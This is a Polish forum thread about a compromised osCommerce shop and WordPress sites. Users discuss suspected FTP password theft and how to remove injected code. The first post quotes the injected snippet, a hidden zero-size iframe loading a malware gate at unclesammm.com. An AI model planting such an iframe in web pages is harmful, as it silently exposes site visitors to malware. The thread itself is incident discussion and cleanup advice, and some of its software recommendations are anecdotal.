Atak unclesammm.com

[mariosz]

Odkryłem dzisiaj w moim sklepie Oscommerce 2,2 dopisany kod w plikach na ftp

atak nastąpił 14 stycznia ale był na tyle niezauważalny że dopiero dzisiaj moją uwagę zwróciła wolna praca sklepu.

Chciał bym się spytać czy jest to znany skrypt i w jaki sposób zabezpieczyć sklep przed tym atakiem

mam zainstalowany "SiteMonitor" "Security Fix for Admin Login Module 1.1.zip" i "Security Pro 2.0 ( r7 )_1"

dopisany kod to:

<!--qpi--><!--/qpi-->

<!--qpi--><iframe src=https://unclesammm.com/gate.php?f=962256 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->

[goszczu]

Zapisujesz hasło w kliencie ftp? Jeśli używasz Total Commandera itp. to bardzo prawdopodobne, że jakis syf wykradł zapisane tam hasło.

[mikeusz]

tolal commander, i ten darmowy filezilla, nie używaj ich. Polecam FlashFXP. Pozmieniaj hasła bo znowu ci to wskoczy, no i usuń wirusa, sprawdź pliki z tą datą modyfikacji.

[cinmar]

masz wordpresa na tym serwerze co zatakowało ci sklep? Jesli tak podaj wersje...

[szyszy]

hej jak sprawdzić czy np u mnie zainfekowało? tez używam total commandera. Do jakich plików dopisuje sie kod na wordpressie?

[szyszy]

Kurcze mam to, jak to wywalić? które pliki nadpisać?

[Webmax]

W wordpresie kod głównie dokleja się do plików index.php. Jeżeli nie radzisz sobie z robotami, które przejmują hasło to ustaw na plik index.php atrybuty (444 - wtedy nikt nie będzie mógł edytować twojego pliku, gdyż na pewno robią to automaty). Atrybut ustawia się w FTP.

[szyszy]

nadpisałem plik index.php i nadal jest ... już chyba mi się dokleił do wp-login.php bo nie mogłem sie zalogować musiałem nadpisać plik i jest ok. Ale mam problemy z uploadem plików przez wp-admina. Jak sie tego pozbyć? Nadpisać wszystkie pliki?

edit nadpisałem i ciagle jest ... jak sie tego pozbyć?

[arve_lek]

i ten darmowy filezilla

Ja tego programu używam. Dlaczego go nie polecasz ? O total commanderze naczytałem się wiele i wiem, że nie jest on zalecany, ale filezilla ? Pytam, bo nie wiem czy zainstalowac sobie coś innego, czy nie.

[cinmar]

Prawdopodobnie to nie jest wina oprogramowania tylko samego wordpresa a dokładnie któreś wtyczki stąd zadałem pytanie czy macie wordpresy na swoich hostingach gdzie doklejany jest ten kawałek kodu, siedzi on również w JS, mialem na jednym z hostingów gdzie szybko się uporałem z tym syfem, jeśli była by to wina TC to musieli by mi złamać hasło główne stąd podejrzenie padło na wordpressa.

edit nadpisałem i ciagle jest ... jak sie tego pozbyć?

oczyścić cały serwer z plików zarażonych, jeśli masz wordpresa to zaktualizować do najnowszej wersji i narazie zrezygnować z dodatkowych wtyczek z nepewnych źrodeł. i dla bezpieczeństwa zmienić hasla dostępu do konta

[szyszy]

no ok ale jak znaleść które sa zarazone?

[cinmar]

metoda dośc prosta i skuteczna pobrać całość domeny na dysk twardy, odpalić wszystie pliki w notepad++, potem wyszukiwarka ( podajemy albo wyrażenie regulane albo jakiś ciąg znaków rozpoznający ten syf) - zamieniamy znaleziony syf na "NIC" i klikamy"zamień we wszystkich otwartych dokumentach" - ważne dobre napisanie wyrażenia lub dopasowania by nie wywaliło ci jakiegoś kodu ze strony.

[szyszy]

ok dzięki zabieram się za poszukiwania

edit: no chyba sie udało, u mnie siedział w plikach templatki w footer.php i script.js

z total commanderem to już gdzieś czytałem że się włamują, ale nigdy mi się nic takiego nie przydażyło ... zawsze jest pierwszy raz